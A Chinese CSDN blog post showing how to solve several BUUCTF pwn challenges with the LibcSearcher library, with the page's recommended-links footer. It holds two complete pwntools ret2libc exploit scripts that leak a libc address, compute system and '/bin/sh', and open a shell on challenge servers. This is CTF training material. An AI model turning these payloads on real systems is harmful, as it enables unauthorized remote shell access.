buuctf ctf (第5.5波)学会使用LibcSearcher

最新推荐文章于 2022-09-18 01:09:22 发布
最新推荐文章于 2022-09-18 01:09:22 发布
阅读量1.4k 收藏 2
点赞数 2
分类专栏: CTF pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847969/article/details/105010095
版权
CTF 同时被 2 个专栏收录
22 篇文章 1 订阅
订阅专栏
pwn
15 篇文章 0 订阅
订阅专栏

这一章是连着上一章的,其实没什么区别,就是介绍了一个LibcSearcher这个库,作用相当简单明了,就是用来代替你需要的libc文件的,就算你的当前目录下没有这个libc文件,只要引入这个库,就可以了。
其本质上与上一波题目没差别,所以可以看成一个类别。

jarvisoj_level3

这道题目在前面也介绍过,这里我们用LibcSearcher来做
可以看到除了将libc=ELF(“libc-2.19.so”)改为了引入LibcSearcher库之外其余操作都一样

from pwn import *
from LibcSearcher import *

#p = process('./level3')
p = remote('node3.buuoj.cn', 26763)
elf = ELF('level3')

read_got = elf.got['read']
write_plt = elf.plt['write']
vul_addr = 0x0804844B


payload = 'a'*0x8C +p32(write_plt) + p32(vul_addr) + p32(1) + p32(read_got) + p32(4)
p.sendlineafter('Input:\n', payload)

read_addr = u32(p.recv(4))
libc = LibcSearcher('read', read_addr)

libc_base = read_addr - libc.dump('read')

system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload = 'a'*0x8C + p32(system_addr) + p32(0) +p32(str_bin_sh)

p.sendlineafter('Input:\n', payload) 

p.interactive()

jarvisoj_level3_x64

与上面的题目基本一样,就是换成了64位,我们来看下其中细微的差别
https://blog.csdn.net/qinying001/article/details/104473597

[HarekazeCTF2019]baby_rop2

同样需要注意这道题的flag不在当前目录下,所以要用下面这个命令
cat ./home/babyrop2/flag
https://blog.csdn.net/qinying001/article/details/104358890?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task

pwn2_sctf_2016

https://blog.csdn.net/weixin_44145820/article/details/104699256

在这里插入图片描述

bjdctf_2020_babyrop

https://www.cnblogs.com/gaonuoqi/p/12312777.html

铁人三项(第五赛区)_2018_rop

https://www.cnblogs.com/luoleqi/p/12381227.html

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'
io = remote('node3.buuoj.cn',28574)

elf = ELF('./2018_rop')

write_got = elf.got['write']
write_plt = elf.plt['write']
read_plt = elf.plt['read']

payload = 'a' * (0x88 + 0x4)
payload += p32(write_plt)
payload += p32(0x80484c6)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

io.sendline(payload)
write_addr = io.recv()
print hex(u32(write_addr))
#libcbase = u32(write_addr) - libc.symbols['write']
#system = libcbase + libc.symbols['system']
#binsh = libcbase + libc.search('/bin/sh').next()

obj = LibcSearcher('write',u32(write_addr))
libcbase = u32(write_addr) - obj.dump('write')
system = libcbase + obj.dump('system')
binsh = libcbase + obj.dump("str_bin_sh")

payload = 'a' * (0x88 + 4)
payload += p32(system)
payload += p32(0)
payload += p32(binsh)

sleep(0.5)
io.sendline(payload)

io.interactive()
月阴荒
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LibcSearcher使用
Sakura给爷pwn全场
12-03 1356
BUUCTF ciscn_2019_c_1 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() sla=lambda x,y:io.sendlineafter(x,y) io=remote('xxx',xxx) elf=ELF('
探索LibcSearcher:二进制安全分析利器
gitblog_00033的博客
04-02 456
探索LibcSearcher:二进制安全分析利器 项目地址:https://gitcode.com/dev2ero/LibcSearcher 在软件开发和安全领域,理解库函数的行为至关重要,尤其是C语言中的libcLibcSearcher是一个创新的开源工具,专门设计用于快速搜索和分析各种libc版本的功能实现。这篇文章将带你深入了解该项目的背景、技术细节、应用场景以及其独特优势。 项目简介 L...
LibcSearcher
ACdream
02-14 4285
来自github的CTF工具 https://github.com/lieanu/LibcSearcher https://github.com/niklasb/libc-database 做pwn题时经常需要泄露libc中某些函数地址(如puts、write、gets等)来确定libc版本,然后根据版本和相对偏移计算system等函数地址,从而进行下一步 例题:基本ROP - ret2l...
LibChecker:用于查看设备中应用程序中使用的库的应用程序
03-20
LibChecker 这是什么? 该应用程序用于查看设备中的应用程序所使用的第三方库。它可以查看应用程序本机库的ABI体系结构(通常,应用程序是64位还是32位)。它还可以查看由标记的知名库,甚至可以根据库引用的数量对其进行排序和查看。 文档 下载
一个用来帮助解析内存overrun的工具libmcheckb.so
dizhigou1665的博客
07-17 322
通过解决long run bug4862,在BSE的指导下学习了一个简易但相对有效的内存完整性检查工具libmcheckb.so的使用。 在这里重新整理和总结,分享给大家。 什么是memory overrun,over run会带来什么后果? Memory overrun,就是指在c/c++环境下,越过数据类型的界限写入的行为。例如bug 4862中,memory overru...
BUUCTF】roarctf_2019_realloc_magic---从一道题认识realloc函数+stdout泄露libc地址实战
Assassin
09-18 1884
realloc好题
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
ctf_vm.zip
05-15
《站在巨人的肩膀上学习ctf vm》一文所用的ctf题目,有杭电_第四周_happyvm,有南邮的vm, 有网鼎杯的vm,,,,
360网络安全课程CTF入门视频.zip
最新发布
06-05
05-CTF基础-音频文件解析以及winhex等工具的使用5.mp4 06-CTF基础-DVWA环境搭建.mp4 07-CTF基础-wireshark分析数据包.mp4 08-CTF基础-图片文件解析.mp4 09- CTF基础-图片文件解析2.mp4 10-CTF基础-图片文件解析3.mp4...
59-59.渗透测试-CTF题目案例.mp4
05-10
59-59.渗透测试-CTF题目案例.mp4
LibcSearcher.zip
06-09
项目地址:https://github.com/lieanu/LibcSearcher,因为依赖于庞大的https://github.com/lieanu/libc-database,大概有490M左右
安装LibcSearcher的方法
热门推荐
neuisf的博客
01-04 1万+
在练习Pwn过程中,要用到python的一个库,叫做LibcSearcher,安装方法如下: 1.git clone https://github.com/lieanu/LibcSearcher.git 2.cd LibcSearcher 3.python setup.py install 4.直接运行python exp.py会提示“No module named LibcSearche...
No matched libc, please add more libc or try others
Dem1的博客
05-18 669
使用libcsearcher库的时候出现报错 弄了很久终于弄好了 打开libcSearcher目录下的libcdatabase #删除libcdatabase里的文件 rm -rf * #重新安装libcdatabase的东西 git clone https://github.com/niklasb/libc-database ./get ubuntu #出现报错Requirements for download or update ‘ubuntu’ are not met. Please, refer
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 671
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
pwn学习---ret2libc绕过地址随机化
gclome的博客
04-10 1154
前情回顾 之前的实践中,当我们开启了栈不可执行,但是关闭了地址随机化,我们可以通过找到system“/bin/sh”的地址,然后利用溢出跳转到system“/bin/sh”的地址去执行,当然,这一切都基于关闭了地址随机化,使得 system() 函数在内存中的地址是不会变化的,并且 libc.so 中也包含 “/bin/sh” 这个字符串,这个字符串的地址也是固定的。 那么问题来了。。。。。。 如...
LibcSearcher--匹配libc版本的神器
Assassin
04-06 8817
文章目录**一、简介****二、安装****版本一:本地判断libc的方法****版本二:在线使用webAPI的方式****三、关于本地libc文件的更新问题****四、使用方法** 一、简介 LibcSearcher是python的一个库,用于解决pwn中不明libc版本的情况,可以根据泄露的某函数地址,推测服务端使用libc版本,是做题必备的神器。 根据网上的版本,我总结两个可以利用的方法 二、安装 版本一:本地判断libc的方法 使用原作者的版本即可,安装指令如下 git clone https
LibcSearcher添加kali自带libc
菜的只能随便写写博客
02-18 1715
LibcSearcher是一个pwn中比较好用的libc版本搜寻,并且带有libc-database,使用kali或者其他linux调试的时候,需要使用本机的libc文件,下面说一说怎么查找本机的libc和添加libc。 查看本机使用libc 以上分别是64位和32位的libc文件所在。 添加libc 找到LibcSearcher所在路径的libc-database文件夹下面,具体使用方法参...
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1502
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
wss://ctf.xidian.edu.cn/api/traffic/Ss5MR7DUQJwSxpV-GBGNF
08-16
你可以在Vue项目的config.vue文件中添加以下配置信息来解决这个问题: ``` devServer: { host: '0.0.0.0', // https: true, port: 6103, client: { webSocketURL: 'wss://ctf.xidian.edu.cn/api/traffic/Ss5MR7DUQJwSxpV-GBGNF/ws', }, headers: { 'Access-Control-Allow-Origin': '*', }, }, ``` 另外,在vue.config.js文件中也可以添加相似的配置代码: ``` devServer: { host: '0.0.0.0', port: 3000, client: { webSocketURL: 'wss://ctf.xidian.edu.cn/api/traffic/Ss5MR7DUQJwSxpV-GBGNF/ws', }, headers: { 'Access-Control-Allow-Origin': '*', }, }, ``` 这样做可以确保你的Vue项目能够成功连接到wss://ctf.xidian.edu.cn/api/traffic/Ss5MR7DUQJwSxpV-GBGNF。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vue项目使用websocket时报错: connection to ‘ws://...‘failed: Error in connection establish](https://blog.csdn.net/weixin_65793170/article/details/128127889)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [WebSocket connection to ‘ws://xxx.xxx.x.xxxx:8080/ws‘failed:问题](https://blog.csdn.net/z914020826/article/details/127232233)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [控制台反复输出WebSocket connection to ‘ws://10.133.212.203:8080/ws‘ failed:](https://blog.csdn.net/weixin_46466212/article/details/126762870)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值